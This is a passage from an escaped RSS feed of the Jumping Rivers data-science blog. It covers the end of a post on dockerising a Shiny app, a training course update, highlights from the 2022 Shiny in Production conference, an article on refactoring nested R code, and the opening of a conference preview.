&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;RUN&lt;/span&gt; Rscript -e &lt;span style="color:#a5d6ff"&gt;&amp;#34;install.packages(&amp;#39;renv&amp;#39;)&amp;#34;&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;RUN&lt;/span&gt; Rscript -e &lt;span style="color:#a5d6ff"&gt;&amp;#34;renv::restore()&amp;#34;&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;COPY&lt;/span&gt; app /srv/shiny-server/&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;EXPOSE&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3838&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;CMD&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;&amp;#34;/usr/bin/shiny-server&amp;#34;&lt;/span&gt;]&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="running-the-app"&gt;Running the app&lt;/h2&gt;
&lt;p&gt;From our Dockerfile we can build the image&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker build --tag auto_shiny_docker .
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and run a container using that image mapping the shiny server port to
the same port on localhost.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm --publish 3838:3838 auto_shiny_docker
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If we navigate in our browser to&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http://localhost:3838
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;we should see the running application.&lt;/p&gt;
&lt;h3 id="see-also"&gt;See also&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;There’s a nice &lt;a href="https://blog.sellorm.com/2021/04/25/shiny-app-in-docker/" rel="external"&gt;blog
post&lt;/a&gt; by
Mark Sellors, which focuses on a particular app, whereas the above
is the general case. Definitely worth a look.&lt;/li&gt;
&lt;li&gt;Our amazing &lt;a href="https://www.jumpingrivers.com/training/course/r-docker-introduction-deployment/" rel="external"&gt;Docker
courses&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-auto-docker/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Training course update - Autumn 2022</title><link>https://www.jumpingrivers.com/blog/training-course-update-autumn-2022/</link><pubDate>Tue, 18 Oct 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/training-course-update-autumn-2022/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/training-course-update-autumn-2022/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/training-course-update-autumn-2022/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Here at Jumping Rivers we like to keep our courses up to date so we can bring you training on the latest tools and technologies. To this end, we have recently added two new courses to our listing!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-training-course-update-autumn-2022"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="reporting-with-quarto"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/reporting-with-quarto/" rel="external"&gt;Reporting with Quarto&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Do you create interactive documents that always need to be updated when the data changes? Then this course is for you. Quarto is a multi-language open source publishing tool that allows for the creation of dynamic content with Python, R, Julia and Observable.&lt;/p&gt;
&lt;h3 id="shiny-for--python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/shiny-for-python/" rel="external"&gt;Shiny for Python&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Do you want to provide interactive visualisation and data exploration features for users who do not have Python and data science skills? Discover how easy it can be with Python for Shiny to develop an application for exploring data without relying on web development or external BI tools.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/training-course-update-autumn-2022/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Highlights from Shiny in Production (2022)</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-highlights/</link><pubDate>Thu, 13 Oct 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-highlights/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-highlights/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-highlights/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Last week, we were very excited to host our first Shiny in Production conference! Attendees gathered in The Catalyst in Newcastle for two days of workshops and talks focusing on all things related to Shiny, building dashboards, and cool things you can do in R.&lt;/p&gt;
&lt;p&gt;On day one, we ran three workshops:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://twitter.com/jwalton3141" rel="external"&gt;Jack Walton&lt;/a&gt; ran a workshop introducing &lt;em&gt;RStudio Connect&lt;/em&gt; - a hosting platform which makes publishing your content painless and easy. In this workshop Jack demonstrated a few different workflows to host, share, and scale content on RStudio Connect.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Theo Roe talked attendees through &lt;em&gt;Automated Reporting with Quarto&lt;/em&gt; - a new open source publishing system - where he demonstrated how to make a range of outputs including simple documents, presentations, and dashboards.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://twitter.com/nrennie35" rel="external"&gt;Nicola Rennie&lt;/a&gt; taught the &lt;em&gt;Introduction to Tableau&lt;/em&gt; workshop where attendees learnt the basics of Tableau, then published their very own dashboard that they had developed during the workshop.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Jumping Rivers run training courses on all three of these topics, so if you&amp;rsquo;re keen to learn even more or if there was a workshop you missed out on, check out our available &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;training courses&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-shiny-in-production-highlights"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;img src="all.jpg" style="width: 600px; display: block; margin-left: auto; margin-right: auto" alt="Speakers grouped together on stage at the conference. Left to right: Chris Beeley, Mark Sellors, Nic Crane, Colin Fay, Mike Smith, Theo Roe, Caterina Constantinescu, Gareth Burns, Andrew Patterson" /&gt;
&lt;h3 id="session-1"&gt;Session 1&lt;/h3&gt;
&lt;h4 id="colin-fay-thinkr"&gt;&lt;a href="https://twitter.com/_ColinFay" rel="external"&gt;Colin Fay&lt;/a&gt; (ThinkR)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;DESTROY ALL WIDGETS!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Colin Fay kicked off the conference by sharing his frustrations with some web apps. This included long load times, visual clutter and accessibility issues. He recommended keeping things simple, only using interactivity when necessary and observing new users exploring your app to understand the UX better. Amusingly, the speakers for the rest of the day became very self-conscious of all of their whizzy HTML widgets and kept apologising to Colin.&lt;/p&gt;
&lt;h4 id="caterina-constantinescu-globallogic"&gt;&lt;a href="https://twitter.com/c__constantine" rel="external"&gt;Caterina Constantinescu&lt;/a&gt; (GlobalLogic)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Journey through a landscape of options: Choosing among web app frameworks for your project&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;With so many web app frameworks out there, it can be confusing to know where to start. Caterina gave us a high level overview of Shiny vs Dash vs Steamlit vs Gradio with an example on a real energy data application. She also recommended a blog by &lt;a href="https://www.datarevenue.com/en-blog/data-dashboarding-streamlit-vs-dash-vs-shiny-vs-voila" rel="external"&gt;Data Revenue&lt;/a&gt; as a good place to start.&lt;/p&gt;
&lt;h3 id="session-2"&gt;Session 2&lt;/h3&gt;
&lt;h4 id="chris-beeley-nhs"&gt;&lt;a href="https://twitter.com/ChrisBeeley" rel="external"&gt;Chris Beeley&lt;/a&gt; (NHS)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Next level Shiny- R, Python, and JavaScript&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&amp;ldquo;Yes, you can do that in Shiny. But don&amp;rsquo;t.&amp;rdquo; Chris kicked off the second session by showing us how you can use other languages such as JavaScript or Python to level-up your Shiny apps. Chris demonstrated how you can combine models you&amp;rsquo;ve built in Python (or JavaScript code you&amp;rsquo;ve written to offload the interactive elements to a user&amp;rsquo;s computer) with Shiny using {reticulate}, {shinyjs}, and {golem}.&lt;/p&gt;
&lt;p&gt;The slides for the talk can be found &lt;a href="https://cdu-data-science-team.github.io/presentations/2022-10-07_shiny-in-production/2022-10-07_shiny-in-production.html#1" rel="external"&gt;online&lt;/a&gt;, and the source code for the slides is available on &lt;a href="https://github.com/CDU-data-science-team/presentations/tree/main/2022-10-07_shiny-in-production" rel="external"&gt;GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="andrew-patterson-jumping-rivers"&gt;&lt;a href="https://twitter.com/A_C_Patt" rel="external"&gt;Andrew Patterson&lt;/a&gt; (Jumping Rivers)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Dockerising a Shiny App&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;In the second talk of the session, Andrew talked about dockerising Shiny apps. He explained what Docker is (a platform for developing and deploying applications), and discussed why you might want to dockerise a Shiny app (and why you might not want to&amp;hellip;). Andrew shared the
&lt;a href="https://gallery-cats.jmpr.io" rel="external"&gt;Which Cat Are You?&lt;/a&gt; app (built by
&lt;a href="https://www.linkedin.com/in/mandy-norrbo/" rel="external"&gt;Mandy Norrbo&lt;/a&gt;) as an example of a Dockerised Shiny app.&lt;/p&gt;
&lt;img src="robot_shiny.png" title="Shiny Robot" alt="Jumping Rivers robot holding a spanner" style="display: block; width: 200px; margin-right: auto; margin-left: auto;" /&gt;
&lt;h3 id="session-3"&gt;Session 3&lt;/h3&gt;
&lt;h4 id="nic-crane-voltron-data--mark-sellors-rstudiodata-orchard"&gt;&lt;a href="https://twitter.com/nic_crane" rel="external"&gt;Nic Crane&lt;/a&gt; (Voltron Data) &amp;amp; &lt;a href="https://twitter.com/sellorm" rel="external"&gt;Mark Sellors&lt;/a&gt; (RStudio/Data Orchard)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Firing an Arrow into the internet of things: combining the power of Arrow, Raspberry Pi &amp;amp; Shiny&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We were seeing double in this tag-team-talk by Nic and Mark, who showed us how
Arrow can be used to analyse larger-than-memory datasets. Nic and Mark
motivated this approach by discussing a real-world IoT problem in which they
used Raspberry Pis to record and analyse data on air quality. On top of this,
Nic and Mark went one step further to explain &lt;em&gt;why&lt;/em&gt; Arrow on S3, and Arrow
and Parquet are so powerful when used in combination.&lt;/p&gt;
&lt;h4 id="theo-roe-jumping-rivers"&gt;Theo Roe (Jumping Rivers)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Expect the Unexpected - {Shiny} &amp;amp; {htmlwidgets}&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Theo closed up session three by recounting a recent project he worked on, in
which a client wished to use interactive Sankey and sunburst diagrams within
Shiny. Although these widgets exist within the D3 framework for JavaScript,
they had yet to be implemented as htmlwidgets in R. Whilst detailing how to
create these widgets, Theo discussed some of the unforeseen technical issues
which arose during this project.&lt;/p&gt;
&lt;h3 id="session-4"&gt;Session 4&lt;/h3&gt;
&lt;h4 id="gareth-burns-exploristics"&gt;&lt;a href="https://twitter.com/GarethBurns4" rel="external"&gt;Gareth Burns&lt;/a&gt; (Exploristics)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Seamlessly integrating Shiny applications into KerusCloud; a cloud-based, clinical trial simulation platform&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Gareth showed us KerusCloud, a cloud-based computing platform developed by Exploristics used to simulate patient populations for clinical trial analysis. Three separate use cases were demonstrated: prototyping, stand-alone applications, as well as embedded applications. You can try it out yourself by visiting the &lt;a href="https://exploristics.com/playground/" rel="external"&gt;KerusCloud Playground&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="mike-smith-pfizer"&gt;&lt;a href="https://twitter.com/MikeKSmith" rel="external"&gt;Mike Smith&lt;/a&gt; (Pfizer)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Offload data manipulation from your Shiny apps and dashboards using {pins}&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;In his talk, Mike highlighted the benefits of separating out your data importing and pre-processing from your Shiny app using {pins}. Data wrangling steps can instead be run with an automated job, and your app only needs to read in the pinned data, which can significantly reduce the overall complexity and loading time of your app.&lt;/p&gt;
&lt;h3 id="what-happens-next"&gt;What happens next?&lt;/h3&gt;
&lt;p&gt;We want to say thank you to the &lt;a href="https://www.nicd.org.uk/" rel="external"&gt;National Innovation Centre for Data&lt;/a&gt;, &lt;a href="https://www.ncl.ac.uk/maths-physics/engagement/nusolve/" rel="external"&gt;NU Solve&lt;/a&gt;, and the &lt;a href="https://rss.org.uk/" rel="external"&gt;Royal Statistical Society&lt;/a&gt; who kindly sponsored the event. Thanks also to our speakers who all gave incredibly insightful presentations, and of course to all our attendees who helped make Shiny in Production such a fantastic event!&lt;/p&gt;
&lt;p&gt;We had such a great time running the Shiny in Production conference, that we&amp;rsquo;re planning on doing it all again next year! Look out for more details coming soon!&lt;/p&gt;
&lt;img src="NICD_logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="NICD logo" /&gt;
&lt;img src="nu-solve-colour.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="NU Solve logo" /&gt;
&lt;img src="royal_statistical_society.jpg" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="RSS logo" /&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-highlights/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Refactoring Russian Doll Code</title><link>https://www.jumpingrivers.com/blog/refactoring-russian-doll-code/</link><pubDate>Thu, 06 Oct 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/refactoring-russian-doll-code/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/refactoring-russian-doll-code/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/refactoring-russian-doll-code/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="refactoring-russian-doll-code"&gt;Refactoring Russian Doll Code&lt;/h2&gt;
&lt;p&gt;Recently, I&amp;rsquo;ve been working with an environmental scientist to refactor a large R package. Let&amp;rsquo;s call her Jane.&lt;/p&gt;
&lt;p&gt;Jane inherited a mess of code, and had to get it working as quickly as possible. She tidied up it as best as she could in the time, but now that the company depended on it, it needed some attention. We referred to it as her &amp;ldquo;Russian Doll code&amp;rdquo; because it had many nested functions, each passing the same giant nested lists back and forth. I could see that it frustrated her every time she had to touch it as she knew there was a better way to structure the code.&lt;/p&gt;
&lt;p&gt;We booked in some &lt;a href="https://www.jumpingrivers.com/consultancy/r-python-stan-development-support/" rel="external"&gt;1:1 support sessions&lt;/a&gt; and sat down together with the aim of making the code easier to work with.&lt;/p&gt;
&lt;img src="vacuum.png" title="Tidy your code" alt="Jumping Rivers robot using a vacuum cleaner on a pile of code and text." style="display: block; width: 400px; margin-right: auto; margin-left: auto;" /&gt;
&lt;h3 id="define-the-messy-zone"&gt;Define the messy zone&lt;/h3&gt;
&lt;p&gt;You know when you tidy your bedroom, you optimistically pull &lt;em&gt;everything&lt;/em&gt; out onto the floor. A few hours later, the bed is covered and there are piles of clothes everywhere. There&amp;rsquo;s no going back, and you aren&amp;rsquo;t going to be able to sleep on your bed tonight unless you clean everything. (Just me?)&lt;/p&gt;
&lt;p&gt;Throughout the refactoring process, it was essential that we were able to continuously run and test the functionality of the package. But how could we rewrite all of our functions without affecting the functionality of the whole code base?&lt;/p&gt;
&lt;p&gt;We decided to start with the smallest functions, and re-write the main body of the code. However, in order to ensure the higher-level functions still worked, we defined a &lt;em&gt;messy zone&lt;/em&gt; at the start and end of each function. In the top messy zone, we would reassign any function parameters to have better names and structure. In the bottom messy zone, we would ensure that the function return matched the old return. We were then free to completely refactor the main bit of the function, knowing that the inputs and outputs were handled.&lt;/p&gt;
&lt;p&gt;Being explicit about where the mess is &amp;ldquo;allowed&amp;rdquo; let us to focus on simplifying and clarifying the internals whilst still ensuring that the higher level code functioned as expected. It also meant that we didn&amp;rsquo;t have to decide on the structure of the function parameters initially, and we could work that out naturally as the code evolved. It also gave us clear markers of where we would need to clean up later, and avoided the issue of forgetting to change parameters everywhere.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;example &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(arg1, arg2) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Messy zone&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; a_better_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; arg1&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;mess&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;ugh
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; helpful_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; arg2&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;what&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;is&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;this
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Refactor the internals&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; useful_result &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; a_better_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; helpful_name
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sensible_name_tibble &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; a_better_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; helpful_name
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Messy Zone&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; results&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;some&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;mess &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; useful_result
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; results&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;another&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;naff&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;list &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sensible_name_tibble
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="push-the-mess-up-push-it-real-good"&gt;Push the mess up (Push it real good)&lt;/h3&gt;
&lt;p&gt;Once we refactored the main bodies of all the small, inner functions, it was time to clean up the mess we had made earlier. We started by listing the arguments and returns of the inner functions. Once we had decided on sensible names and formats, we changed them all in one go across all functions - clearing the messy zone.&lt;/p&gt;
&lt;p&gt;We were then free to move up a level, to the next Russian doll, pushing the mess up. We kept repeating this process, slowly moving up through the layers, from the smallest Russian doll, up until we were at the top of the code base.&lt;/p&gt;
&lt;img src="featured.jpg" title="Russian Dolls" alt="Seven, traditional wooden Russian Dolls doing from largerst on the left, to smallest on the right." style="display: block; width: 400px; margin-right: auto; margin-left: auto;" /&gt;
&lt;h3 id="start-with-a-blank-slate"&gt;Start with a blank slate&lt;/h3&gt;
&lt;p&gt;When you&amp;rsquo;re refactoring a function, it can be tempting to copy the old function into a new script, and just start editing. However, the copy-paste method for refactoring can tie you to the style of the old function, making redesign harder. We found that writing the revised functions from scratch forced us to reconsider every step of the old function and challenge every step. Ask yourself, what is this function actually trying to achieve, and how should we implement it?&lt;/p&gt;
&lt;h3 id="take-time-to-design"&gt;Take time to design&lt;/h3&gt;
&lt;p&gt;Jane and I had one session where we didn&amp;rsquo;t touch any code &lt;em&gt;at all&lt;/em&gt;. We talked, doodled and drew diagrams. You might leave a session like this feeling a little deflated that you didn&amp;rsquo;t achieve anything. However, that session was actually the most valuable. In the following session we made huge progress, because we had already done the hard work of thinking out the design fully. We were able to whizz through the functions, implementing our new design efficiently. We found ourselves constantly referring back to the diagrams to remind ourselves of the design choices we had made.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-refactoring-russian-doll-code"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="a-good-name-goes-a-long-way"&gt;A good name goes a long way&lt;/h3&gt;
&lt;p&gt;We all know that it&amp;rsquo;s important to choose good names for parameters and functions. However, in this project, I was surprised just how much of a difference a good name makes. Sometimes, the &lt;em&gt;only&lt;/em&gt; thing we would change in a function would be the names. Often a simple rename morphed the unintelligible code in front of me into a clear, readable explanation of the approach.&lt;/p&gt;
&lt;h3 id="test-regularly"&gt;Test regularly&lt;/h3&gt;
&lt;p&gt;Things are going to go wrong. You are going to accidentally delete a line of code, or put a bracket in the wrong place. If you ensure that your code is always run-able then you can constantly check your code still works by running your tests. This is particularly important when implementing statistical models to ensure that numerical results are unaffected by the refactor. In R, the &lt;a href="https://testthat.r-lib.org/" rel="external"&gt;{testthat}&lt;/a&gt; package makes it easy and painless to add package tests. If you&amp;rsquo;re using git, using continuous integration to run an R package check on every commit takes away the burden of remembering to stop and test.&lt;/p&gt;
&lt;h3 id="why-rather-than-how"&gt;Why rather than How&lt;/h3&gt;
&lt;p&gt;The code was initially what I would call &amp;ldquo;&lt;strong&gt;How&lt;/strong&gt;&amp;rdquo; programming. The different components of the functions were grouped by &lt;em&gt;how&lt;/em&gt; the calculations were computed programmatically rather than &lt;em&gt;why&lt;/em&gt; we were calculating them. This made it hard for someone new to the code to understand what each function did.&lt;/p&gt;
&lt;p&gt;I&amp;rsquo;m not an environmental scientist, so I don&amp;rsquo;t understand all of the science behind Jane&amp;rsquo;s complex model. However, by asking questions about what she was trying to achieve, we re-grouped the different stages of each function in terms of the science, rather than the implementation. Changing focus of the code to the scientific method made it much clearer to follow.&lt;/p&gt;
&lt;img src="colab.jpg" title="Collaboration" alt="Cartoon of four people sat around a table, with laptops. One of them is pointing at a projector screen with the python logo on it." style="display: block; width: 400px; margin-right: auto; margin-left: auto;" /&gt;
&lt;h3 id="do-it-with-a-friend"&gt;Do it with a friend&lt;/h3&gt;
&lt;p&gt;Refactoring can be quite daunting. You&amp;rsquo;ve often got lots of moving parts and it can be difficult to hold both the overall design, and the small technical details in your head at the same time. Having someone to pair program with you makes this much easier. In our sessions, Jane would &amp;ldquo;drive&amp;rdquo;, coding the finer technical implementations, whilst I was the passenger, observing and challenging her on whether the implementation she was writing fitted in with our grand design. The person helping you doesn&amp;rsquo;t have to understand the code in detail, in fact sometimes it helps if they don&amp;rsquo;t! It can also be more fun to work collaboratively, we would celebrate together when we were able to delete a large chunk of obsolete code.&lt;/p&gt;
&lt;h3 id="wrap-up"&gt;Wrap up&lt;/h3&gt;
&lt;p&gt;Refactoring code properly takes time, and sometimes it can be hard to justify the cost. However, poorly written code is difficult to develop, time consuming to maintain and tends to mask bugs which are hiding in the cobwebs of functions that no-one really understands any more. Hopefully these tips will help the next time you get the chance to refactor some code. Here they are again:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Define the messy zone&lt;/li&gt;
&lt;li&gt;Push the mess up&lt;/li&gt;
&lt;li&gt;Start with a blank slate&lt;/li&gt;
&lt;li&gt;Take time to design&lt;/li&gt;
&lt;li&gt;A good name goes a long way&lt;/li&gt;
&lt;li&gt;Test regularly&lt;/li&gt;
&lt;li&gt;Why rather than How&lt;/li&gt;
&lt;li&gt;Do it with a friend&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/refactoring-russian-doll-code/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production: Coming up</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-coming-up/</link><pubDate>Tue, 04 Oct 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-coming-up/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-coming-up/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-coming-up/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Shiny in Production is just around the corner. We can&amp;rsquo;t wait to welcome you all to Newcastle on Thursday and Friday. Here&amp;rsquo;s a quick round up of what you can expect!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-shiny-in-production-coming-up"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
